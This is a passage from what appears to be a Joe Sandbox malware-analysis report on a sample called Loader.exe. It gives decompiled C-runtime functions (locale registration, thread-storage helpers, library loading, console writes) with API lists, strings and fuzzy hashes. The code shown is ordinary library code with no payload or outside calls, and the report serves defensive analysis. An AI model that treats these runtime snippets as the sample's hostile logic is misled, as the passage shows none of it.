0x00af7f5e
0x00af7f65
0x00af7f6f
0x00af7f71
0x00af7f74
0x00af7f77
0x00af7f7a
0x00af7f7d
0x00af7f80
0x00af7f86
0x00af8291
0x00af8291
0x00000000
0x00af7f8c
0x00af7f94
0x00af7f97
0x00af7f9d
0x00af7fa0
0x00af7fa7
0x00af7fae
0x00af7fb1
0x00000000
0x00000000
0x00af7fba
0x00af7fbf
0x00af7fc1
0x00af7fc4
0x00af7fc9
0x00af7fcd
0x00000000
0x00000000
0x00000000
0x00af7fcd
0x00af7fd2
0x00af7fd4
0x00af7fd9
0x00af8093
0x00af809a
0x00af809b
0x00af809e
0x00af80a0
0x00af8244
0x00af8246
0x00000000
0x00af8248
0x00af8248
0x00af824b
0x00af825a
0x00af825e
0x00af825f
0x00af825f
0x00000000
0x00af8263
0x00af80a6
0x00af80a8
0x00af80ae
0x00af80b1
0x00af80bd
0x00af80c6
0x00af80d1
0x00af80d6
0x00af80d9
0x00af80dc
0x00000000
0x00af80e2
0x00af80e2
0x00000000
0x00af80e2
0x00af80dc
0x00af7fdf
0x00af7fee
0x00af7fef
0x00af7ff2
0x00af7ff5
0x00af7ffa
0x00af8210
0x00af8212
0x00af8214
0x00af8216
0x00af8220
0x00af8228
0x00af822a
0x00af822b
0x00af822f
0x00af8232
0x00af8232
0x00af8236
0x00af8236
0x00af8236
0x00af8239
0x00af8239
0x00af8239
0x00af823b
0x00af823b
0x00af823f
0x00af8000
0x00af8000
0x00af8003
0x00af8005
0x00af8008
0x00af800b
0x00af800f
0x00af8010
0x00af8014
0x00af8017
0x00af801c
0x00af8026
0x00af802b
0x00af802e
0x00af8031
0x00af8031
0x00af8034
0x00af8037
0x00af8039
0x00af8042
0x00af8046
0x00af8047
0x00af804b
0x00af8051
0x00af805a
0x00af8067
0x00af806e
0x00af8072
0x00af807d
0x00af8082
0x00af8088
0x00000000
0x00af808e
0x00af80e5
0x00af80e6
0x00af8169
0x00af8170
0x00af8178
0x00af8180
0x00af8185
0x00af8188
0x00af818d
0x00000000
0x00af8193
0x00af81a8
0x00af8288
0x00af828e
0x00000000
0x00af81ae
0x00af81b7
0x00af81b9
0x00af81bf
0x00000000
0x00af81c5
0x00af81c9
0x00af81ff
0x00af8202
0x00000000
0x00af8208
0x00af8208
0x00000000
0x00af8208
0x00af81cb
0x00af81cd
0x00af81cf
0x00af81e8
0x00000000
0x00af81ee
0x00af81f2
0x00000000
0x00af81f8
0x00af81f8
0x00af81fb
0x00af81fc
0x00000000
0x00af81fc
0x00af81f2
0x00af81e8
0x00af81c9
0x00af81bf
0x00af81a8
0x00af818d
0x00af8088
0x00af7ffa
0x00000000
0x00af80ea
0x00af80ea
0x00af80ee
0x00af80f1
0x00af8113
0x00af8116
0x00af811b
0x00af811f
0x00af8123
0x00af8151
0x00af8153
0x00000000
0x00af8125
0x00af8125
0x00af8128
0x00af812b
0x00af812e
0x00af8265
0x00af8268
0x00af826b
0x00af8275
0x00af8280
0x00af8285
0x00000000
0x00af8134
0x00af813b
0x00af8140
0x00af8143
0x00af8146
0x00000000
0x00af814c
0x00af814c
0x00000000
0x00af814c
0x00af8146
0x00af812e
0x00af80f3
0x00af80f7
0x00af80fa
0x00af80ff
0x00af8105
0x00af8107
0x00af810e
0x00af8154
0x00af8157
0x00af8158
0x00af815d
0x00af8160
0x00af8163
0x00000000
0x00000000
0x00000000
0x00000000
0x00af8163
0x00000000
0x00af80f1
0x00af7f8c
0x00af8294
0x00af8294
0x00af8296
0x00af8299
0x00af8299
0x00af8299
0x00af8299
0x00af82ab
0x00af82ad
0x00af82ae
0x00af82af
0x00af82b9

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00AF7F56
__fassign.LIBCMT ref: 00AF813B
__fassign.LIBCMT ref: 00AF8158
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AF81A0
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00AF81E0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AF8288

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: f7f56687f0ba73a7e2b095a7f938056eec0ef7e22a54a9291a8b309f8e83e379
Instruction ID: aac58d0fe7952a95ac2fd8a44bc9b0e267ca233364c44e280c7e014514ffbed8
Opcode Fuzzy Hash: f7f56687f0ba73a7e2b095a7f938056eec0ef7e22a54a9291a8b309f8e83e379
Instruction Fuzzy Hash: 46C18C71D0025C9FCF15CFE8C9809EDBBB5AF19314F28416AE965FB241EA35AD06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AE15D0 Relevance: 9.1, APIs: 6, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00AE15D0(intOrPtr _a4) {
				char _v52;
				char _v56;
				char _v60;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t36;
				void* _t40;
				signed int _t45;
				signed int _t46;
				signed char _t47;
				signed int _t50;
				signed int _t54;
				signed int _t60;
				intOrPtr* _t61;
				signed int _t62;
				intOrPtr _t64;
				void* _t69;

				_t47 = 0;
				_v56 = 0;
				E00AE708B( &_v56, 0);
				_t60 =  *0xb37aa8; // 0x2
				_t64 =  *0xb37ab4; // 0x7da050
				if(_t60 == 0) {
					E00AE708B( &_v60, _t60);
					_t69 =  *0xb37aa8 - _t47; // 0x2
					if(_t69 == 0) {
						_t45 =  *0xb37b88; // 0x3
						_t46 = _t45 + 1;
						 *0xb37b88 = _t46;
						 *0xb37aa8 = _t46;
					}
					E00AE70E3( &_v60);
					_t60 =  *0xb37aa8; // 0x2
				}
				_t50 =  *(_a4 + 4);
				if(_t60 >=  *((intOrPtr*)(_t50 + 0xc))) {
					_t61 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t50 + 8)) + _t60 * 4));
					if(_t61 != 0) {
						L24:
						E00AE70E3( &_v56);
						return _t61;
					} else {
						L8:
						if( *((intOrPtr*)(_t50 + 0x14)) == _t47) {
							L11:
							if(_t61 != 0) {
								goto L24;
							} else {
								goto L12;
							}
						} else {
							_t40 = E00AE7402();
							if(_t60 >=  *((intOrPtr*)(_t40 + 0xc))) {
								L12:
								if(_t64 == 0) {
									_push(8);
									_t62 = E00AE903D(__eflags);
									__eflags = _t62;
									if(_t62 == 0) {
										_t61 = 0;
										__eflags = 0;
									} else {
										_t54 =  *(_a4 + 4);
										__eflags = _t54;
										if(_t54 == 0) {
											_t36 = 0xb0525c;
										} else {
											_t36 =  *(_t54 + 0x18);
											__eflags = _t36;
											if(_t36 == 0) {
												_t36 = _t54 + 0x1c;
											}
										}
										_push(_t36);
										E00AE19B0(_t47,  &_v52);
										 *(_t62 + 4) = _t47;
										_t47 = 1;
										 *_t62 = 0xb062e0;
									}
									__eflags = _t47 & 0x00000001;
									if(__eflags != 0) {
										E00AE2EC0( &_v52, _t61);
									}
									E00AE73D6(__eflags, _t61);
									 *((intOrPtr*)( *_t61 + 4))();
									 *0xb37ab4 = _t61;
									goto L24;
								} else {
									E00AE70E3( &_v56);
									return _t64;
								}
							} else {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t40 + 8)) + _t60 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00ae15d7
0x00ae15de
0x00ae15e2
0x00ae15e7
0x00ae15ed
0x00ae15f5
0x00ae15fc
0x00ae1601
0x00ae1607
0x00ae1609
0x00ae160e
0x00ae160f
0x00ae1614
0x00ae1614
0x00ae161d
0x00ae1622
0x00ae1622
0x00ae162c
0x00ae1632
0x00ae1644
0x00ae1644
0x00000000
0x00ae1634
0x00ae1637
0x00ae163c
0x00ae16e8
0x00ae16ec
0x00ae16fa
0x00ae1642
0x00ae1646
0x00ae1649
0x00ae165b
0x00ae165d
0x00000000
0x00000000
0x00000000
0x00000000
0x00ae164b
0x00ae164b
0x00ae1653
0x00ae1663
0x00ae1665
0x00ae167c
0x00ae1683
0x00ae1688
0x00ae168a
0x00ae16c2
0x00ae16c2
0x00ae168c
0x00ae1690
0x00ae1693
0x00ae1695
0x00ae16a3
0x00ae1697
0x00ae1697
0x00ae169a
0x00ae169c
0x00ae169e
0x00ae169e
0x00ae169c
0x00ae16a8
0x00ae16ad
0x00ae16b2
0x00ae16b5
0x00ae16ba
0x00ae16ba
0x00ae16c4
0x00ae16c7
0x00ae16cd
0x00ae16cd
0x00ae16d3
0x00ae16df
0x00ae16e2
0x00000000
0x00ae1667
0x00ae166d
0x00ae167b
0x00ae167b
0x00ae1655
0x00ae1658
0x00000000
0x00ae1658
0x00ae1653
0x00ae1649
0x00ae163c

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AE15E2
std::_Lockit::_Lockit.LIBCPMT ref: 00AE15FC
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE161D
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE166D
std::_Facet_Register.LIBCPMT ref: 00AE16D3
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE16EC

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
String ID:
API String ID: 1858714459-0
Opcode ID: 84adfa9b1b20585ca6a6369d7b8be8d2dad72fdb768ae69446b705fcbc80b08c
Instruction ID: 122712ad96f373ddfb0f0e1752151b6363348991444359022185a4adb08fd428
Opcode Fuzzy Hash: 84adfa9b1b20585ca6a6369d7b8be8d2dad72fdb768ae69446b705fcbc80b08c
Instruction Fuzzy Hash: DA31C1716082A08FC721DF46E980A6FB7A4EF90710F69046DEC465B252DF71ED46CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00AEBD5A Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00AEBD5A(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0xb36bd0 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00AECF4B(_t13, __eflags,  *0xb36bd0);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00AECF86(_t14, __eflags,  *0xb36bd0, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E00AED2E6();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00AECF86(_t18, __eflags,  *0xb36bd0, 0);
								} else {
									_t8 = E00AECF86(_t18, __eflags,  *0xb36bd0, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00AED2F1(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x00aebd5a
0x00aebd61
0x00aebd74
0x00aebd7b
0x00aebd7d
0x00aebd7e
0x00aebd81
0x00aebd9a
0x00aebd9a
0x00aebd83
0x00aebd83
0x00aebd85
0x00aebd8f
0x00aebd96
0x00aebd98
0x00aebd9f
0x00aebda8
0x00aebdab
0x00aebdac
0x00aebdae
0x00aebdc2
0x00aebdc2
0x00aebdcb
0x00aebdb0
0x00aebdb7
0x00aebdbd
0x00aebdbe
0x00aebdc0
0x00aebdd4
0x00aebdd6
0x00aebdd6
0x00000000
0x00000000
0x00000000
0x00aebdc0
0x00aebdd9
0x00000000
0x00000000
0x00000000
0x00aebd98
0x00aebd85
0x00aebde1
0x00aebdeb
0x00aebd63
0x00aebd65
0x00aebd65

APIs

GetLastError.KERNEL32(?,?,00AEBD51,00AEABFA,00AE99C7), ref: 00AEBD68
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AEBD76
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AEBD8F
SetLastError.KERNEL32(00000000,00AEBD51,00AEABFA,00AE99C7), ref: 00AEBDE1

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3342c4bd3240b76993a220e9c227b8931fc4cb26caff9ced8abc10ca911c6ba7
Instruction ID: 52ac6285dfdea4707d9facf908078b7da55fec2d500d62141339c4985582229e
Opcode Fuzzy Hash: 3342c4bd3240b76993a220e9c227b8931fc4cb26caff9ced8abc10ca911c6ba7
Instruction Fuzzy Hash: F601243222D7616EE6212BB67CCB9AF2754EB41371B304329F110CA0E0FF218C059A64

Uniqueness

Uniqueness Score: -1.00%

Function 00AFC1DA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AFC1DA(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E00AFB701(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00AFB701(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E00AEF1E5(GetLastError());
									_t17 =  *((intOrPtr*)(E00AEF21B(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00AF0FA2(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00AEF1E5(GetLastError());
						_t17 =  *((intOrPtr*)(E00AEF21B(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00AF0FA2(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00AF1027(_a8);
				return 0;
			}

0x00afc1e0
0x00afc1e5
0x00afc1f9
0x00afc1fc
0x00afc22e
0x00afc236
0x00afc238
0x00afc251
0x00afc254
0x00afc257
0x00afc265
0x00afc274
0x00afc27c
0x00afc27e
0x00afc297
0x00afc29a
0x00afc29a
0x00afc280
0x00afc287
0x00afc292
0x00afc292
0x00afc29c
0x00afc29d
0x00000000
0x00afc29d
0x00afc25c
0x00afc261
0x00afc263
0x00000000
0x00000000
0x00000000
0x00afc263
0x00afc241
0x00afc24c
0x00000000
0x00afc24c
0x00afc1fe
0x00afc201
0x00afc204
0x00afc217
0x00afc21a
0x00afc21c
0x00afc21e
0x00000000
0x00afc21e
0x00afc20a
0x00afc20f
0x00afc211
0x00000000
0x00000000
0x00000000
0x00afc211
0x00afc1ea
0x00000000

Strings

C:\Users\user\Desktop\Loader.exe, xrefs: 00AFC1DF

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\Loader.exe
API String ID: 0-2978016887
Opcode ID: e26ad94d6252c77359d1c9423c44e01cd9089947e3b88c85c07d1f4e420fc5c7
Instruction ID: 633fa18459e90872077c2895c08262693b938674382fcd5fcda80c800f0171d2
Opcode Fuzzy Hash: e26ad94d6252c77359d1c9423c44e01cd9089947e3b88c85c07d1f4e420fc5c7
Instruction Fuzzy Hash: 8221687160020DAFDB20BBE69E80DBB77ADEA40374B104624FA29D7551EB25EC40A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF4997 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00AF4997(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0xb36d20; // 0x5
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00AF6B67(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00AF4A92(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00AF6B67(__eflags,  *0xb36d20, _t18);
							if(__eflags != 0) {
								E00AF466E(_t18, "(4}");
								E00AF4AEF(0);
								goto L13;
							} else {
								_t13 = 0;
								E00AF6B67(__eflags,  *0xb36d20, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00AF6B67(0,  *0xb36d20, 0);
							_push(0);
							L9:
							E00AF4AEF();
							goto L4;
						}
					}
				} else {
					_t18 = E00AF6B28(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0xb36d20; // 0x5
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x00af49a2
0x00af49a4
0x00af49a9
0x00af49ac
0x00af49ca
0x00af49cd
0x00af49d2
0x00af49d4
0x00000000
0x00af49d6
0x00af49e2
0x00af49e6
0x00af49e8
0x00af4a0d
0x00af4a0f
0x00af4a28
0x00af4a2f
0x00000000
0x00af4a11
0x00af4a11
0x00af4a1a
0x00af4a1f
0x00000000
0x00af4a1f
0x00af49ea
0x00af49ea
0x00af49ea
0x00af49f3
0x00af49f8
0x00af49f9
0x00af49f9
0x00000000
0x00af49fe
0x00af49e8
0x00af49ae
0x00af49b4
0x00af49b8
0x00af49c5
0x00000000
0x00af49ba
0x00af49bd
0x00af4a37
0x00af4a37
0x00af49bf
0x00af49bf
0x00af49bf
0x00af49c1
0x00af49c1
0x00af49c1
0x00af49bd
0x00af49b8
0x00af4a3a
0x00af4a42
0x00af4a4b

APIs

GetLastError.KERNEL32(00000001,00000001,00000002,00AEF220,00AF54D2,00000000,?,00AE9ED7,00000002,00000000,?,?,?,00AE1D2E,00000001,00000004), ref: 00AF499C
_free.LIBCMT ref: 00AF49F9
_free.LIBCMT ref: 00AF4A2F
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AE9ED7,00000002,00000000,?,?,?,00AE1D2E,00000001,00000004), ref: 00AF4A3A

Strings

(4}, xrefs: 00AF4A22

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: (4}
API String ID: 2283115069-1551970364
Opcode ID: 1e3c80ce75f4e6fa43568311b8ae96162104e34c7fbc41a73c01e4573c92f6da
Instruction ID: 54fcf5dafbb6b15d25f890b0a8effa3ee384849be09e6e0144d8400a699a5bce
Opcode Fuzzy Hash: 1e3c80ce75f4e6fa43568311b8ae96162104e34c7fbc41a73c01e4573c92f6da
Instruction Fuzzy Hash: ED11A17238460D7AD61137F9AD85E3F2A69ABCD3B1B340234F324D71E1EE628C005224

Uniqueness

Uniqueness Score: -1.00%

Function 00AECDF2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AECDF2(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0xb3821c + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0xb07b88 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00AF44C8(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00aecdf9
0x00aece6d
0x00aecdfe
0x00aece00
0x00aece07
0x00aece0b
0x00aece14
0x00aece23
0x00aece2c
0x00aece30
0x00aece79
0x00aece7b
0x00aece7f
0x00aece82
0x00aece82
0x00aece88
0x00aece88
0x00aece74
0x00aece78
0x00aece78
0x00aece32
0x00aece3b
0x00aece65
0x00aece68
0x00aece6a
0x00aece6a
0x00000000
0x00aece6a
0x00aece3d
0x00aece48
0x00aece4d
0x00aece52
0x00000000
0x00000000
0x00aece59
0x00aece5f
0x00aece63
0x00000000
0x00000000
0x00000000
0x00aece63
0x00aece10
0x00000000
0x00000000
0x00000000
0x00aece12
0x00aece72
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,00AECEB3,00000000,00000FA0,00B381C4,00000000,?,00AECFDE,00000004,InitializeCriticalSectionEx,00B07C7C,InitializeCriticalSectionEx,00000000), ref: 00AECE82

Strings

api-ms-, xrefs: 00AECE42

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: e8c5147383124a3d1621f606bcca3181feb7ba72b47a85982b7647a130f8ebe0
Instruction ID: 34b01e98f07f558792febea70362503fadf2b8ffe9b9e3334a76fde4d61a01d6
Opcode Fuzzy Hash: e8c5147383124a3d1621f606bcca3181feb7ba72b47a85982b7647a130f8ebe0
Instruction Fuzzy Hash: 6711C232A41660ABDF328B699C40B5E77A49F15B70F250260F905EB280EB60ED028BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00AF1DAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00AF1DAB(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xb05148(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00af1db1
0x00af1db5
0x00af1dc0
0x00af1dc8
0x00af1dd3
0x00af1dd9
0x00af1ddd
0x00af1de4
0x00af1dea
0x00af1dea
0x00af1dec
0x00af1df1
0x00000000
0x00af1df6
0x00af1dfd

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00AF1DA0,?,?,00AF1D68,?,00000000,?), ref: 00AF1DC0
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AF1DD3
FreeLibrary.KERNEL32(00000000,?,?,00AF1DA0,?,?,00AF1D68,?,00000000,?), ref: 00AF1DF6

Strings

CorExitProcess, xrefs: 00AF1DCB
mscoree.dll, xrefs: 00AF1DB9

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 86dd24798145768db5c5257d3a780d77a14c7090d5455eba7eed3ee15ef9ff8e
Instruction ID: 1565cf3a3b552fa4780c3d1d9ac8ff387c9dbf73330e448d33a660d77b7c7949
Opcode Fuzzy Hash: 86dd24798145768db5c5257d3a780d77a14c7090d5455eba7eed3ee15ef9ff8e
